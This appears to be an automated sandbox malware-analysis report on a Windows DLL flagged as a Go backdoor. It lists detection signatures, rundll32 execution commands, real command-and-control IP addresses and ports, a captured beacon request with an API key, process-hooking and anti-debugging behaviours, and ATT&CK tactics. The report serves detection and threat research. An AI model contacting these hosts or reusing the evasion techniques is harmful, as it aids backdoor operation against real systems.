Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll
Analysis ID:1490750
MD5:ff432e4003e9d7135a97bd4dc0445dc3
SHA1:41530cb367ca6b69378179b4bba91deaf7d3a342
SHA256:03495c3e0d041d6c6c1949cf6cfabea9b3d4308fee9cbf85754bb00b434d3778
Tags:dll

Detection

GO Backdoor
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6860 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6996 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7100 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7020 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5480 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7132 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3060 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
Source: Process Memory Space: rundll32.exe PID: 7020 | Rule: JoeSecurity_GOBackdoor | Description: Yara detected GO Backdoor | Author: Joe Security
Source: Process Memory Space: rundll32.exe PID: 7100 | Rule: JoeSecurity_GOBackdoor | Description: Yara detected GO Backdoor | Author: Joe Security
Source: Process Memory Space: rundll32.exe PID: 7132 | Rule: JoeSecurity_GOBackdoor | Description: Yara detected GO Backdoor | Author: Joe Security
No Sigma rule has matched
Timestamp:2024-08-09T19:28:49.448134+0200
SID:2855536
Severity:1
Source Port:49739
Destination Port:26395
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:2024-08-09T19:28:49.429828+0200
SID:2855539
Severity:1
Source Port:26395
Destination Port:49739
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:2024-08-09T19:29:19.090843+0200
SID:2855538
Severity:1
Source Port:26395
Destination Port:49739
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:2024-08-09T19:29:18.867934+0200
SID:2855537
Severity:1
Source Port:49739
Destination Port:26395
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.5% probability
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.238.229.63 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 195.2.70.38 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.238.224.56 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 91.142.74.28 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.238.250.123 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 94.103.90.9 26395
Source: global traffic | TCP traffic: 94.103.90.9 ports 2,26395,3,5,6,9
Source: rundll32.exe, 00000003.00000002.3546566789.000000006B46B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546365132.000000006B46B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2007679967.000000006B46B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.3544673830.000000006B46B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2047988912.000000006B46B000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 94.103.90.9:26395
Source: Joe Sandbox View | IP Address: 91.142.74.28 91.142.74.28
Source: Joe Sandbox View | IP Address: 77.238.229.63 77.238.229.63
Source: Joe Sandbox View | ASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox View | ASN Name: TELERU-ASRU TELERU-ASRU
Source: Joe Sandbox View | ASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox View | ASN Name: TELERU-ASRU TELERU-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 195.2.70.38 (14 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 91.142.74.28 (14 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 94.103.90.9 (22 occurrences)
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Host: 195.2.70.38 | User-Agent: Go-http-client/1.1 | Content-Length: 158 | X-Api-Key: 4bxNKbGL | Accept-Encoding: gzip | Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 | Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Source: Network traffic | Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.90.9:26395 -> 192.168.2.4:49739
Source: Network traffic | Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49739 -> 94.103.90.9:26395
Source: Network traffic | Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49739 -> 94.103.90.9:26395
Source: Network traffic | Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.90.9:26395 -> 192.168.2.4:49739
Source: rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 00000003.00000002.3540798444.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3540798444.000000000D05C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3543726410.000000000D1A4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3540333299.000000000CC56000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 00000006.00000002.3543061500.000000000CDA6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.142.74.28
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | String found in binary or memory: https://www.globalsign.com/repository/0

        System Summary

        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: becb`
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: [e[fe
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: ^^STU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: bY^eU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: Y\d^_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: T]^[_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: eZ]e\
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: f^Ycc
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: invalid certificate
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: Number of sections : 12 > 10
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
        Source: classification engine | Classification label: mal88.troj.evad.winDLL@14/1@0/6
        Source: C:\Windows\System32\loaddll32.exe | File created: C:\Users\user\AppData\Local\config
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03
        Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | ReversingLabs: Detection: 36%
        Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll"
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
        Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
        Source: C:\Windows\System32\loaddll32.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\loaddll32.exe | Section loaded: winmm.dll
        Source: C:\Windows\System32\loaddll32.exe | Section loaded: powrprof.dll
        Source: C:\Windows\System32\loaddll32.exe | Section loaded: umpdc.dll
        Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: Image base 0x6c2c0000 > 0x60000000
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static file information: File size 15196072 > 1048576
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: Raw size of TUaYW is bigger than: 0x100000 < 0xe77600
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: initial sample | Static PE information: section where entry point is pointing to: TUaYW
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: becb`
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: [e[fe
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: ^^STU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: bY^eU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: a_SfU
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: Y\d^_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: T]^[_
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: eZ]e\
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: f^Ycc
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: cUfXW
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: TUaYW
        Source: SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll | Static PE information: section name: SZVZY

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6860 base: 16F0005 value: E9 8B 2F 81 75
        Source: C:\Windows\System32\loaddll32.exe | Memory written: PID: 6860 base: 76F02F90 value: E9 7A D0 7E 8A
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 7020 base: 2810005 value: E9 8B 2F 6F 74
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 7020 base: 76F02F90 value: E9 7A D0 90 8B
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 7100 base: 2E60005 value: E9 8B 2F 0A 74
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 7100 base: 76F02F90 value: E9 7A D0 F5 8B
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5480 base: 4920005 value: E9 8B 2F 5E 72
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 5480 base: 76F02F90 value: E9 7A D0 A1 8D
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 7132 base: 520005 value: E9 8B 2F 9E 76
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 7132 base: 76F02F90 value: E9 7A D0 61 89
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 3060 base: 650005 value: E9 8B 2F 8B 76
        Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 3060 base: 76F02F90 value: E9 7A D0 74 89
        Source: C:\Windows\System32\loaddll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6CCC5333
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6C0A8385
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6C0206AC
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6C0F89DD
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6CCFBD28
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6C9CAC5A
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6CBE2C2B
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6CBD697D
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6CCC7F85
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6C799AC7
        Source: C:\Windows\System32\loaddll32.exe | API/Special instruction interceptor: Address: 6C8036DF
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
        Source: loaddll32.exe, 00000000.00000002.3078250832.000000000126D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3539796517.0000000002CDA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3539212045.0000000002C4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3539177203.000000000067A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.238.229.63 80
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 195.2.70.38 80
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.238.224.56 80
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 91.142.74.28 80
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 77.238.250.123 80
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 94.103.90.9 26395
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation

        Stealing of Sensitive Information

        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7132, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7132, type: MEMORYSTR
        MITRE ATT&CK Matrix (one line per tactic column; a digit prefix before a technique name is the report's matched-signature marker, kept as extracted):
        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
